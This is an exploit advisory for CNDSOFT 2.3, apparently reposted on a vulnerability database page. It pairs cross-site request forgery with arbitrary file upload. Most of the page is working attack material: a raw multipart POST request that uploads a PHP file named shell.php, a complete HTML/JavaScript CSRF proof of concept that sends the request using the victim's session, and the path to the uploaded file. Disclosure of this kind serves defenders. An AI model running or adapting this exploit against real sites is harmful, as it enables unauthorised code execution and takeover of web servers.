Vulners
Lucene search
CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload Vulnerability
*=========================================================================================================
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
*=========================================================================================================
Vulnerable URL and Parameter
========================================
Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
Vulnerable Parameter = &mesaj_baslik
TECHNICAL DETAILS & POC & POST DATA
========================================
POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
aa
Content-Type: multipart/form-data;
boundary=---------------------------5035863528338
Content-Length: 1037
-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"
a
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"
CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"
meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"
meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"
[email protected]
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"
30000
-----------------------------5035863528338
Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
Content-Type: application/octet-stream
*<?php
phpinfo();
?>*
-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"
5200
-----------------------------5035863528338--
*CSRF PoC - File Upload (Shell.php)*
========================================
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "
http://site_name/ofis/index.php?is=kullanici_tanimla", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
xhr.withCredentials = true;
var body = "-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"utf8\"\r\n" +
"\r\n" +
"\xe2\x9c\x93\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
+
"\r\n" +
"CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
"\r\n" +
"meryem\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
+
"\r\n" +
"meryem\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
"\r\n" +
"[email protected]\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"30000\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php \r\n" +
"\tphpinfo();\r\n" +
"\r\n" +
" ?\x3e\r\n" +
"-----------------------------5035863528338\r\n" +
"Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
"\r\n" +
"5200\r\n" +
"-----------------------------5035863528338--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
========================================
*Access File : *http://www.site_name/path/personel_resimleri/shell.php
RISK
========================================
Attacker can arbitrary file upload.
--
Besim ALTINOK
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Oct 2016 00:00Current
7.1High risk
Vulners AI Score7.1